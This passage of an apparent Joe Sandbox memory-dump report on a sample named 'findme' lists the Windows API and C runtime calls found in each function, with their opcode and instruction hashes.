                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast$FileHandleRead
                    • String ID:
                    • API String ID: 2244327787-0
                    • Opcode ID: a936cf1f7be0f475d86203d868415b66a4ea507339bad1e3dc6f843a0cedccec
                    • Instruction ID: 0114ff84c06fc4feb48f475714e4ccecba29a01bb7050316372f6dbcd99817f7
                    • Opcode Fuzzy Hash: a936cf1f7be0f475d86203d868415b66a4ea507339bad1e3dc6f843a0cedccec
                    • Instruction Fuzzy Hash: 27115139920204FFDB606F51C808F7A77A8EB06731F14852FE46A87694DB39DD409F6A
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004CCFE0,00000000,00000000,?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue), ref: 004EA526
                    • GetLastError.KERNEL32(?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue,004F7348,004F7350,00000000,00000364,?,004E9077), ref: 004EA532
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004EA49B,004CCFE0,00000000,00000000,00000000,?,004EA698,00000006,FlsSetValue,004F7348,004F7350,00000000), ref: 004EA540
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 02a82c6a70378ac457320d57bc2793ec7a44ec2a6c7cf2d1e9fc1cc075f5b1d9
                    • Instruction ID: 7685cfda53ede0db36189b9dd4411b381d873f6232b5edaf8aa10100132213eb
                    • Opcode Fuzzy Hash: 02a82c6a70378ac457320d57bc2793ec7a44ec2a6c7cf2d1e9fc1cc075f5b1d9
                    • Instruction Fuzzy Hash: 1101F732711272BBC7218F6A9C44A677B58AF55BA37140632F906D3240DB39F921CBED
                    APIs
                      • Part of subcall function 004E8FA5: GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                      • Part of subcall function 004E8FA5: _free.LIBCMT ref: 004E8FDC
                      • Part of subcall function 004E8FA5: SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                      • Part of subcall function 004E8FA5: _abort.LIBCMT ref: 004E9023
                      • Part of subcall function 004EB2AE: _abort.LIBCMT ref: 004EB2E0
                      • Part of subcall function 004EB2AE: _free.LIBCMT ref: 004EB314
                      • Part of subcall function 004EAF1B: GetOEMCP.KERNEL32(00000000,?,?,004EB1A5,?), ref: 004EAF46
                    • _free.LIBCMT ref: 004EB200
                    • _free.LIBCMT ref: 004EB236
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorLast_abort
                    • String ID: O
                    • API String ID: 2991157371-4042636462
                    • Opcode ID: 5fca13d5a823a3791950fc8fd730a07720e89bd355f2dda9c5e9a3f028ab89d5
                    • Instruction ID: 15d8cbf04cee53621da165a243d8b338d8e62a9dc6ffc1494a40bc5008341ec2
                    • Opcode Fuzzy Hash: 5fca13d5a823a3791950fc8fd730a07720e89bd355f2dda9c5e9a3f028ab89d5
                    • Instruction Fuzzy Hash: CD31F531900284AFDB10EF9BC845A6FB7E1EF40326F24409FE5045B2A1EB395D41CB88
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,004CCC94,00000001,?,?,?,00000000,004D4ECD,?,?,?), ref: 004C9F4C
                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,004D4ECD,?,?,?,?,?,004D4972,?), ref: 004C9F8E
                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,004CCC94,00000001,?,?), ref: 004C9FB8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileWrite$Handle
                    • String ID:
                    • API String ID: 4209713984-0
                    • Opcode ID: 082bdc0169d247a79be7d77bdf3f717e156b7da14c1265d1162869cbb6df9b46
                    • Instruction ID: 981223981723ac13d88a4a32675670e549d0debef06bca258ddf0afd8b766528
                    • Opcode Fuzzy Hash: 082bdc0169d247a79be7d77bdf3f717e156b7da14c1265d1162869cbb6df9b46
                    • Instruction Fuzzy Hash: 58310575208305ABDF608F14D948F6BBBA4EB40755F04456EF945DB281CB78DC48CBBA
                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA22E
                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA261
                    • GetLastError.KERNEL32(?,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA27E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CreateDirectory$ErrorLast
                    • String ID:
                    • API String ID: 2485089472-0
                    • Opcode ID: 941602fa43bbf680b3a21da82f6ae051190605cbbc3fb9a12de4562d15d3f1b3
                    • Instruction ID: 55bfdaf2d06e3e2dc6acc18ba498748820493a53ca2b32f6e6a21a618a3df928
                    • Opcode Fuzzy Hash: 941602fa43bbf680b3a21da82f6ae051190605cbbc3fb9a12de4562d15d3f1b3
                    • Instruction Fuzzy Hash: 2D01A12914112C65DBA1AB759C09FEA3358AB06749F08049FF800D5351CA6DCA61C6AF
                    APIs
                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004EB019
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Info
                    • String ID:
                    • API String ID: 1807457897-3916222277
                    • Opcode ID: 5be333a72196adc3a7b571c397bf7c918e2df381843247443b64f3bdb5933692
                    • Instruction ID: 5dd810b07d980fdb08ac7e289227e39290becb6c7915098f7062410b5b99013f
                    • Opcode Fuzzy Hash: 5be333a72196adc3a7b571c397bf7c918e2df381843247443b64f3bdb5933692
                    • Instruction Fuzzy Hash: A9414A705043CC9ADF218E268C94BF7BBA9DF45305F1404EEE59A87242D339AE46CFA4
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 004EA79D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx
                    • API String ID: 2568140703-3893581201
                    • Opcode ID: 5b32bd1d5719c447ff94c31994679a14f18e27595d0cd8463b6214b91d918975
                    • Instruction ID: 51e8904610cf1cdf985e8f762fe73c3e46e3b4e546dc10cc29cc0bbe546757dc
                    • Opcode Fuzzy Hash: 5b32bd1d5719c447ff94c31994679a14f18e27595d0cd8463b6214b91d918975
                    • Instruction Fuzzy Hash: A901483250420CBBCF02AFA2DC01DEE3F66EF08711F014156FE1425160CA3AD931EB9A
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004E9D2F), ref: 004EA715
                    Strings
                    • InitializeCriticalSectionEx, xrefs: 004EA6E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2593887523-3084827643
                    • Opcode ID: 6bb9e33e259f9d70ff47ad2ab589ea48ee5393d7c87a097b156c3e5402212be9
                    • Instruction ID: 8f25a107af983019027de429c9abb780d1ed83d922761c8d33deefaa90fe3f4c
                    • Opcode Fuzzy Hash: 6bb9e33e259f9d70ff47ad2ab589ea48ee5393d7c87a097b156c3e5402212be9
                    • Instruction Fuzzy Hash: 4BF0593060420CBBCB006F52CC05DBE7F60EF04721B004066FD085A360CA39AE30E789
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Alloc
                    • String ID: FlsAlloc
                    • API String ID: 2773662609-671089009
                    • Opcode ID: c9f74d7221b21057516df9a82d39e562ffecfe477718683e5eb6c8a922497cd9
                    • Instruction ID: ee822efadb6966fa46d12e2d6c4fa0a57f0c6b0436a93a254eabc84185b030ab
                    • Opcode Fuzzy Hash: c9f74d7221b21057516df9a82d39e562ffecfe477718683e5eb6c8a922497cd9
                    • Instruction Fuzzy Hash: 75E02030A4522CBBD2106B629C02ABEBA50CB14B12B51006BFD045A240CD682A21D2DE
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 004E32AF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: try_get_function
                    • String ID: FlsAlloc
                    • API String ID: 2742660187-671089009
                    • Opcode ID: 338e3e5077c0c5eb94e99f6df0b3c79695a0412a654c7ca6613531651fbfa0e4
                    • Instruction ID: 2da79390947cda3624a48572257b91024009f692cdf77c49cea3394713f361c9
                    • Opcode Fuzzy Hash: 338e3e5077c0c5eb94e99f6df0b3c79695a0412a654c7ca6613531651fbfa0e4
                    • Instruction Fuzzy Hash: B0D0C231781A786AE11136826C02ABABA048F01FB7B4501A3FF0C9A2428469451041CD
                    APIs
                      • Part of subcall function 004EAF1B: GetOEMCP.KERNEL32(00000000,?,?,004EB1A5,?), ref: 004EAF46
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004EB1EA,?,00000000), ref: 004EB3C4
                    • GetCPInfo.KERNEL32(00000000,004EB1EA,?,?,?,004EB1EA,?,00000000), ref: 004EB3D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID:
                    • API String ID: 546120528-0
                    • Opcode ID: 2970004c5ed9fad09846d2d8bcc3ecbb40fa38f9df72169d632ef9fec01f11df
                    • Instruction ID: 0359b95c5070294bc0a972bebda24f9ff1d9191789588ff4a0cf74b1bcb00247
                    • Opcode Fuzzy Hash: 2970004c5ed9fad09846d2d8bcc3ecbb40fa38f9df72169d632ef9fec01f11df
                    • Instruction Fuzzy Hash: 405125709002959EDB209F77C8816BBBBE5EF41316F18406FD49687293D73DA542CBC9
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D2DA4
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D2DBC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: a6af875a5f4662bd307c249f127de44dfcc4c10ac9d0d0b29aff031aa3926c78
                    • Instruction ID: c72fbfcbfd537580adde4296682e8866b206983f156cf28dcd932321a308950c
                    • Opcode Fuzzy Hash: a6af875a5f4662bd307c249f127de44dfcc4c10ac9d0d0b29aff031aa3926c78
                    • Instruction Fuzzy Hash: D74114B0A087816BD728EE75D6A879AF794BFA4304F04052FE55943342C7BCA848C79E
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C6057: __EH_prolog.LIBCMT ref: 004C605C
                      • Part of subcall function 004CC827: __EH_prolog.LIBCMT ref: 004CC82C
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC86F
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC893
                    • new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 16a8fe00a236b1412945059ba6074ebc447e4f565f961e451fea4e32006f55ec
                    • Instruction ID: 23d624908a6db3c55f3c1d47020c1ddd923eb635fddd1e69cb58da1649c1d5ce
                    • Opcode Fuzzy Hash: 16a8fe00a236b1412945059ba6074ebc447e4f565f961e451fea4e32006f55ec
                    • Instruction Fuzzy Hash: 7B4176B4805B409ED724DF7A8485AE7FBE5FB18304F504A6FD6EE83282CB362554CB19
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C6057: __EH_prolog.LIBCMT ref: 004C605C
                      • Part of subcall function 004CC827: __EH_prolog.LIBCMT ref: 004CC82C
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC86F
                      • Part of subcall function 004CC827: new.LIBCMT ref: 004CC893
                    • new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 52a02a06d5a5992d18b75f2dc43d422d046a7aee51b89f4397e9d76b43fa4d10
                    • Instruction ID: d063cbbaae061e4b932207d35e38cb06b19abec7db932b87df387b1289b33dcc
                    • Opcode Fuzzy Hash: 52a02a06d5a5992d18b75f2dc43d422d046a7aee51b89f4397e9d76b43fa4d10
                    • Instruction Fuzzy Hash: 644165B4805B409EE724DF7A8485AE7FAE5FB19304F504A6FD1EE83282CB362554CB19
                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004C9EDC,?,?,004C7867), ref: 004C97A6
                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004C9EDC,?,?,004C7867), ref: 004C97DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70ad214ec86c7157e396bbf46a870a1c6236f9cc7e5bf4e8d449e3d72a5d0fd4
                    • Instruction ID: ac5454bf7be2717c0e4c8ab8b3992c94259b33f4818e8e8bfe73b9434b0b8ac9
                    • Opcode Fuzzy Hash: 70ad214ec86c7157e396bbf46a870a1c6236f9cc7e5bf4e8d449e3d72a5d0fd4
                    • Instruction Fuzzy Hash: 4B212874102744EFD7708F15C889FA7B7E8EB49768F00492EF5D582291C378AC458B65
                    APIs
                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004C7547,?,?,?,?), ref: 004C9D7C
                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 004C9E2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$BuffersFlushTime
                    • String ID:
                    • API String ID: 1392018926-0
                    • Opcode ID: a55251e25da3cf640afb4564135f2f791d76cf6e8c969e5e8e4aa5a4c8609c6e
                    • Instruction ID: 0b523be2f746c488e697d1c9dec1532c914f6264a1b06426f280f21c9e7618ee
                    • Opcode Fuzzy Hash: a55251e25da3cf640afb4564135f2f791d76cf6e8c969e5e8e4aa5a4c8609c6e
                    • Instruction Fuzzy Hash: 5221E435148246BBC750DE25C455FABBBE4AF51708F04085FB4C293241C72DEE0CCBA5
                    APIs
                    • GetProcAddress.KERNEL32(00000000,004F3958), ref: 004EA4B8
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004EA4C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressProc__crt_fast_encode_pointer
                    • String ID:
                    • API String ID: 2279764990-0
                    • Opcode ID: 7b6f569b7b3fe90cbaa71530bef54d19359ad1f38d9501539f4412cd86ffccf2
                    • Instruction ID: f3b9d0ddd428bba19f374afb836be75628cd2ee2732dc963b7fee3a072d5a143
                    • Opcode Fuzzy Hash: 7b6f569b7b3fe90cbaa71530bef54d19359ad1f38d9501539f4412cd86ffccf2
                    • Instruction Fuzzy Hash: 5B113D336001649BAF31DE2BEC4486B73919B803217164122FD15EF394DA78FC21C7DA
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,004C9B35,?,?,00000000,?,?,004C8D9C,?), ref: 004C9BC0
                    • GetLastError.KERNEL32 ref: 004C9BCD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
